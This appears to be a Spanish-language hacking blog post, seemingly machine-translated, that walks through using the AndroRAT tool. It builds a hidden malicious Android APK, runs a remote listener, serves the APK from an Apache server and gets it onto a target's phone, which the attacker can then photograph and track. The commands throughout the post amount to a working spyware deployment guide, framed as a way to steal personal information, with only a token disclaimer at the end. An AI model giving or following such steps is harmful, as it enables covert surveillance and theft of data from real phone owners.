Hay muchos piratas informáticos en este mundo que pueden estar observando sus actividades diariamente e intentarán robar su información personal.

¡Y hoy, te mostraré cómo hacer precisamente eso!

Requisito previo

• Github instalado
• Python3 instalado
• pipa instalada
• java instalado
• La dirección IP de su máquina
• Sistema Linux

Comencemos nuestro Hacking

Usaremos un método de piratería que es phishing para nuestro blog de hoy. Puede obtener más información sobre el phishing en Wikipedia. La herramienta que usaremos es AndroRat.

AndroRAT es una herramienta diseñada para dar el control del sistema Android de forma remota y recuperar información del mismo. Androrat es una aplicación cliente/servidor desarrollada en Java Android para el lado del cliente y el servidor está en Python.

Una herramienta simple de administración remota de Android usando sockets. Utiliza java en el lado del cliente y python en el lado del servidor

Clone el repositorio que se indica a continuación.

por HTTPS

git clone https://github.com/karma9874/AndroRAT.git

por SSH

git clone [email protected]:karma9874/AndroRAT.git

Vaya al directorio donde ha clonado el repositorio mediante el comando cd .

cd <Directory_name>AndroRat

• En nuestra carpeta AndroRat, hay 9 subcarpetas y trabajaremos con el archivo de extensión .py.

  
  

Avanzando más, ahora tenemos que instalar algunos requisitos para nuestra instalación por pip Al usar el comando pip, podemos instalar bibliotecas de paquetes de python con un solo clic.

Requisitos de instalación

pip install -r requirements.txt

• Hemos satisfecho nuestros requisitos para nuestro sistema.

• También podemos verificar qué requisitos se necesitan escribiendo el comando dado

cat requirements.txt

Construyendo un archivo apk malicioso para espiar

Construiremos un archivo apk malicioso que se necesita instalar en el teléfono de destino y lo bueno es que después de instalar este apk, su archivo apk se oculta y nadie puede ver este archivo. ¿Guay, verdad?

Construyamos este archivo malicioso

para construir este apk, debe escribir el comando que se indica a continuación

python3 androRat.py --build -i <ip_address> -p 4444 -o <apk_name>.apk

Explicación del código anterior

• androRat.py → El archivo de nuestros directorios clonados
• --build → para construir nuestro archivo apk
• -i → Dirección IP de su sistema y, en caso de que no sepa la dirección IP de su sistema, escriba el siguiente comando.

ifconfig

Si no sabe dónde está escrita la dirección IP de su máquina en la salida dada por ifconfig, entonces debe buscar 192 números prefijados en su salida de ifconfig.

• -p - número de puerto

• -o archivo de salida

  
  

La salida debe verse como la imagen que se muestra a continuación.

Ahora es el momento de alojar al oyente.

Todo lo que tienes que hacer es escribir el código que se muestra a continuación.

python3 androRAT.py --shell -i 0.0.0.0 -p 4444

• Ahora regrese a otra terminal, escriba otro comando para iniciar el servidor web apache

sudo systemctl status apache2.service

• Ahora, copiemos nuestro archivo y enviémoslo a la web escribiendo el siguiente comando

  
  

sudo cp piyush.apk /var/www/html/

• Ahora, escriba lo siguiente en el móvil de destino y debería descargar su apk

  
  

<ip_address>/piyush.apk

• Después de descargar el archivo apk, instálelo y ábralo para aceptar todos los permisos, ¡y se acabó el juego!

  
  

  

  

  • Cuando eche un vistazo al oyente, obtendrá esta interfaz.

• Ahora, escriba 'ayuda' y presione enter. Obtendrá los comandos y podrá hacer lo siguiente.

Por ejemplo, si desea tomar una foto del móvil de destino, escriba el comando 'tomar foto'. Si desea obtener su ubicación, escriba el comando 'getLocation'.

Este blog fue con fines de entretenimiento, no intentes hacer nada poco ético con él porque siempre eres responsable de tus acciones.

Para anónimo, no intentes hackear mi dirección IP, ya la he cambiado.

Nos vemos en la próxima. Adiós.